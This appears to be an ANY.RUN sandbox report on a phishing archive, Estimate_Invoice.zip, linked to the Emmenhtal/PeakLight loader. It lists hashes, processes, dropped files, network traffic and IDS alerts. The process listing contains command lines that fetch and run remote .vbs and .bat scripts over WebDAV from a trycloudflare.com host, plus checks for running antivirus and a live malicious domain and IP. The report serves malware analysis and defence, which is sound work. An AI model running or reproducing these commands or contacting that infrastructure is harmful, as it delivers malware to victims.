| File name: | Estimate_Invoice.zip |
| Full analysis: | https://app.any.run/tasks/76159599-3359-42e9-a3fd-9998d96fb742 |
| Verdict: | Malicious activity |
| Threats: | First identified in 2024, Emmenhtal operates by embedding itself within modified legitimate Windows binaries, often using HTA (HTML Application) files to execute malicious scripts. It has been linked to the distribution of malware such as CryptBot and Lumma Stealer. Emmenhtal is typically disseminated through phishing campaigns, including fake video downloads and deceptive email attachments. |
| Analysis date: | January 22, 2025, 16:23:29 |
| OS: | Windows 10 Professional (build: 19045, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/zip |
| File info: | Zip archive data, at least v2.0 to extract, compression method=deflate |
| MD5: | 578322B46D6F1BED3B7846EDD993DEA0 |
| SHA1: | 22AC7FE0B9A26D0D929601158FD399F9ED3C5C4A |
| SHA256: | 4A3BF63C7C390946B3B90FD1132979363B9A59067ADE44224BE58ED5DAEFDB55 |
| SSDEEP: | 12:5jMaKdlR5rlTfUDdgklL/RYadWhavgtaxI:9MaulR/TsDbNWhavu |
| .zip | | | ZIP compressed archive (100) |
|---|
| ZipRequiredVersion: | 20 |
|---|---|
| ZipBitFlag: | - |
| ZipCompression: | Deflated |
| ZipModifyDate: | 2025:01:22 14:35:30 |
| ZipCRC: | 0x0546b88d |
| ZipCompressedSize: | 134 |
| ZipUncompressedSize: | 151 |
| ZipFileName: | 1SAVBSAYHNBMASA.url |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2192 | C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache | C:\Windows\System32\svchost.exe | services.exe | ||||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: Host Process for Windows Services Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4120 | tasklist /FI "IMAGENAME eq AvastUI.exe" | C:\Windows\System32\tasklist.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Lists the current running tasks Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5032 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5752 | find /i "AvastUI.exe" | C:\Windows\System32\find.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Find String (grep) Utility Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5780 | "C:\Windows\System32\cmd.exe" /c \\visitor-deputy-christmas-halo.trycloudflare.com@SSL\DavWWWRoot\new.bat | C:\Windows\System32\cmd.exe | — | wscript.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5872 | "C:\WINDOWS\System32\WScript.exe" "\\visitor-deputy-christmas-halo.trycloudflare.com@SSL\DavWWWRoot\new.vbs" | C:\Windows\System32\wscript.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.812.10240.16384 Modules
| |||||||||||||||
| 6148 | tasklist /FI "IMAGENAME eq avgui.exe" | C:\Windows\System32\tasklist.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Lists the current running tasks Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6156 | find /i "avgui.exe" | C:\Windows\System32\find.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Find String (grep) Utility Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6296 | "C:\Program Files\WinRAR\WinRAR.exe" C:\Users\admin\Desktop\Estimate_Invoice.zip | C:\Program Files\WinRAR\WinRAR.exe | explorer.exe | ||||||||||||
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.91.0 Modules
| |||||||||||||||
| 6480 | C:\WINDOWS\System32\rundll32.exe C:\WINDOWS\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding | C:\Windows\System32\rundll32.exe | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| (PID) Process: | (6296) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory |
| Operation: | write | Name: | 3 |
Value: C:\Users\admin\Desktop\preferences.zip | |||
| (PID) Process: | (6296) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory |
| Operation: | write | Name: | 2 |
Value: C:\Users\admin\Desktop\chromium_ext.zip | |||
| (PID) Process: | (6296) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory |
| Operation: | write | Name: | 1 |
Value: C:\Users\admin\Desktop\omni_23_10_2024_.zip | |||
| (PID) Process: | (6296) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory |
| Operation: | write | Name: | 0 |
Value: C:\Users\admin\Desktop\Estimate_Invoice.zip | |||
| (PID) Process: | (6296) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | name |
Value: 120 | |||
| (PID) Process: | (6296) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | size |
Value: 80 | |||
| (PID) Process: | (6296) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | type |
Value: 120 | |||
| (PID) Process: | (6296) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | mtime |
Value: 100 | |||
| (PID) Process: | (6296) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached |
| Operation: | write | Name: | {FBF23B40-E3F0-101B-8488-00AA003E56F8} {000214E4-0000-0000-C000-000000000046} 0xFFFF |
Value: 01000000000000000EEE0A01EA6CDB01 | |||
| (PID) Process: | (6296) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer |
| Operation: | write | Name: | SlowContextMenuEntries |
Value: 6024B221EA3A6910A2DC08002B30309D0A010000BD0E0C47735D584D9CEDE91E22E23282770100000114020000000000C0000000000000468D0000006078A409B011A54DAFA526D86198A780390100009AD298B2EDA6DE11BA8CA68E55D895936E000000 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 6580 | svchost.exe | C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\{0E9C8D63-0403-4934-9D8F-A3B1027DCBD4}.zip | — | |
MD5:— | SHA256:— | |||
| 6580 | svchost.exe | C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\{2DCDF93C-FAC5-4F59-8082-55C18B3427A0}.zip | — | |
MD5:— | SHA256:— | |||
| 6676 | powershell.exe | C:\Users\admin\Downloads\downloaded.zip | — | |
MD5:— | SHA256:— | |||
| 6880 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_syt1sfog.j25.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 6580 | svchost.exe | C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\{69D7C553-86DD-47B1-9698-4BF5BC02CE83}.bat | text | |
MD5:214DD7B385CBEF755B375A2670F93540 | SHA256:0BFDE78A02CA0C04C294556CA7085266BF94F2B1009194FD2092340170524F51 | |||
| 6676 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:EB356FCF5AC1D9698519F91199A17DB5 | SHA256:161AA3C122CE2E4C09D2156C2DED9DB2C768C1C78D7CC0B26700C7DAE9814507 | |||
| 6676 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_lrrllx3b.5yu.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 6880 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_15fwywm1.xrk.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 6580 | svchost.exe | C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\{F2B70F7E-A7E0-419C-8AB9-1F8EE9FF9C8D}.bat | text | |
MD5:214DD7B385CBEF755B375A2670F93540 | SHA256:0BFDE78A02CA0C04C294556CA7085266BF94F2B1009194FD2092340170524F51 | |||
| 6880 | powershell.exe | C:\Users\admin\Downloads\Extracted\Python\Launcher\py.exe | executable | |
MD5:79EAE4FA8DD7E1CA489E59AB19B4FBED | SHA256:E52553F941CEB9E715D239E7A211501CE5D6096EEEB90FB161B7BFEDF6A61DAB | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
6296 | WinRAR.exe | OPTIONS | 200 | 45.202.32.77:7530 | http://jsnybsafva.one:7530/ | unknown | — | — | unknown |
6580 | svchost.exe | OPTIONS | 200 | 45.202.32.77:7530 | http://jsnybsafva.one:7530/ | unknown | — | — | unknown |
6580 | svchost.exe | PROPFIND | 207 | 45.202.32.77:7530 | http://jsnybsafva.one:7530/ | unknown | — | — | unknown |
6580 | svchost.exe | PROPFIND | 207 | 45.202.32.77:7530 | http://jsnybsafva.one:7530/1FSABRY8KASVAB | unknown | — | — | unknown |
6580 | svchost.exe | PROPFIND | 207 | 45.202.32.77:7530 | http://jsnybsafva.one:7530/ | unknown | — | — | unknown |
6580 | svchost.exe | PROPFIND | 207 | 45.202.32.77:7530 | http://jsnybsafva.one:7530/1FSABRY8KASVAB | unknown | — | — | unknown |
6580 | svchost.exe | GET | 200 | 45.202.32.77:7530 | http://jsnybsafva.one:7530/1FSABRY8KASVAB/1FSABRY8KASVAB_pdf.lnk | unknown | — | — | unknown |
1176 | svchost.exe | GET | 200 | 2.17.190.73:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | whitelisted |
6580 | svchost.exe | PROPFIND | 207 | 45.202.32.77:7530 | http://jsnybsafva.one:7530/1FSABRY8KASVAB | unknown | — | — | unknown |
6580 | svchost.exe | PROPFIND | 207 | 45.202.32.77:7530 | http://jsnybsafva.one:7530/1FSABRY8KASVAB | unknown | — | — | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
— | — | 20.73.194.208:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
6296 | WinRAR.exe | 45.202.32.77:7530 | jsnybsafva.one | MULTA-ASN1 | MU | malicious |
5160 | RUXIMICS.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
6580 | svchost.exe | 45.202.32.77:7530 | jsnybsafva.one | MULTA-ASN1 | MU | malicious |
2736 | svchost.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
5064 | SearchApp.exe | 104.126.37.129:443 | www.bing.com | Akamai International B.V. | DE | whitelisted |
1176 | svchost.exe | 20.190.159.71:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
1176 | svchost.exe | 2.17.190.73:80 | ocsp.digicert.com | AKAMAI-AS | DE | whitelisted |
Domain | IP | Reputation |
|---|---|---|
jsnybsafva.one |
| unknown |
settings-win.data.microsoft.com |
| whitelisted |
www.bing.com |
| whitelisted |
login.live.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
visitor-deputy-christmas-halo.trycloudflare.com |
| whitelisted |
go.microsoft.com |
| whitelisted |
slscr.update.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
fe3cr.delivery.mp.microsoft.com |
| whitelisted |
PID | Process | Class | Message |
|---|---|---|---|
6296 | WinRAR.exe | Misc Attack | ET DROP Spamhaus DROP Listed Traffic Inbound group 5 |
6580 | svchost.exe | Misc activity | ET HUNTING Successful PROPFIND Response for Application Media Type |
6580 | svchost.exe | Misc activity | ET INFO LNK File Downloaded via HTTP |
6580 | svchost.exe | A Network Trojan was detected | ET MALWARE PeakLight/Emmenhtal Loader Payload Request |
6580 | svchost.exe | Potential Corporate Privacy Violation | POLICY [ANY.RUN] A suspicious Lnk file was downloaded causing the exe file to be executed |
6580 | svchost.exe | Potential Corporate Privacy Violation | POLICY [ANY.RUN] A suspicious Lnk file leading to a WebDAV resource was downloaded |
6580 | svchost.exe | A Network Trojan was detected | MALWARE [ANY.RUN] A malicious Lnk file was loaded that leads to the TryCloudflare WebDAV proxy server |
6580 | svchost.exe | Misc activity | ET HUNTING Successful PROPFIND Response for Application Media Type |
6580 | svchost.exe | Misc activity | ET HUNTING Successful PROPFIND Response for Application Media Type |
6580 | svchost.exe | Misc activity | ET HUNTING Successful PROPFIND Response for Application Media Type |